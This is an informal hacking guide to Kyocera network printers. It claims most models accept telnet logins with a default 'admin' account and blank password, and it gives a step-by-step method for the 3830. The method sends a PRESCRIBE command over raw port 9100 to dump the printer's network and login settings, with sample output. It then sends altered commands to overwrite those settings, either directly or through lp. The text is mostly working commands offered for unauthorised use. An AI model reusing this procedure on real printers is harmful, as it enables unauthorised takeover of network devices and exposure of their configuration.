Kyocera Printers

Kyocera printers have various security flaws. Most of them can be telnetted to on the default port and accessed with the default username ?admin? and blank password. There is a very decent menu interface to change everything.

For the Kyocera 3830, which is a current model workgroup printer they disabled the telnetting to the default port for ?security?. 
These printers, if they can be accessed, can provide up to around 100mb of storage, email facilities, networking information and various other details.

The 3830?s have a back door. Telnetting to port 9100 (the printer data port) allows you to send raw text to the printer, but if you drop the correct command in  at this point, you can get full access to the printers settings. So here we go.

Telnet to port 9100 of a 3830.

Drop in this command and save the output:

!R!SIOP0,?COMREADBACK:0?;EXIT;

This will give you output similar to this:

CMNT Offset 0×006a Size = 1 ; SIOP0,?CUSTOM:Network Status Page = 0?;
CMNT Offset 0×006b Size = 1 ; SIOP0,?CUSTOM:TCP/IP BOOTP = 0?;
CMNT Offset 0×006c Size = 1 ; SIOP0,?CUSTOM:TCP/IP Protocol = 1?;
CMNT Offset 0×006d Size = 1 ; SIOP0,?CUSTOM:TCP/IP DHCP = 0?;
CMNT Offset 0×006e Size = 1 ; SIOP0,?CUSTOM:RARP = 1?;
CMNT Offset 0×006f Size = 1 ; SIOP0,?CUSTOM:ARP/PING = 1?;
CMNT Offset 0×0070 Size = 4 ; SIOP0,?CUSTOM:IP Address = 172.16.1.212?;
CMNT Offset 0×0074 Size = 4 ; SIOP0,?CUSTOM:Subnet Mask = 255.255.255.0?;
CMNT Offset 0×0078 Size = 4 ; SIOP0,?CUSTOM:Default Gateway = 0.0.0.0?;
CMNT Offset 0×007c Size = 256 ; SIOP0,?CUSTOM:Domain Name = ???;
CMNT Offset 0×017c Size = 4 ; SIOP0,?CUSTOM:DNS Server (Primary) = 0.0.0.0?;
CMNT Offset 0×0180 Size = 4 ; SIOP0,?CUSTOM:DNS Server (Secondary) = 0.0.0.0?;
CMNT Offset 0×0184 Size = 4 ; SIOP0,?CUSTOM:WINS Server (Primary) = 0.0.0.0?;
CMNT Offset 0×0188 Size = 4 ; SIOP0,?CUSTOM:WINS Server (Secondary) = 0.0.0.0?;
CMNT Offset 0×018c Size = 225 ; SIOP0,?CUSTOM:Scope ID = ???;
CMNT Offset 0×026d Size = 1 ; SIOP0,?CUSTOM:NetWare Protocol = 1?;
CMNT Offset 0×026e Size = 1 ; SIOP0,?CUSTOM:Frame Type = 1?;
CMNT Offset 0×026f Size = 1 ; SIOP0,?CUSTOM:Operation Mode = 1?;
CMNT Offset 0×0270 Size = 32 ; SIOP0,?CUSTOM:Print Server Name = ?admin??;
CMNT Offset 0×0290 Size = 32 ; SIOP0,?CUSTOM:Login Password = ???;
CMNT Offset 0×02b0 Size = 2 ; SIOP0,?CUSTOM:Queue Polling Interval = 4?;
CMNT Offset 0×02b2 Size = 1 ; SIOP0,?CUSTOM:NetWare Banner Page = 1?;
CMNT Offset 0×02b3 Size = 1 ; SIOP0,?CUSTOM:Bindery Mode = 1?;
CMNT Offset 0×02b4 Size = 32 ; SIOP0,?CUSTOM:File Server 1 = ???;

Now, if you want to change a setting just grab the part after the ?offset ;? section, insert your own text/ip address/whatever and throw it back on to the 9100 connection.

!R!SIOP0,?CUSTOM:LP1 End of Job String = ?!R! RES; EXIT;??;EXIT;

Your other option is to stick all the commands in a text file then do this from the unix prompt (without quotes):

lp -d?printername? ?textfilename?

Done and done.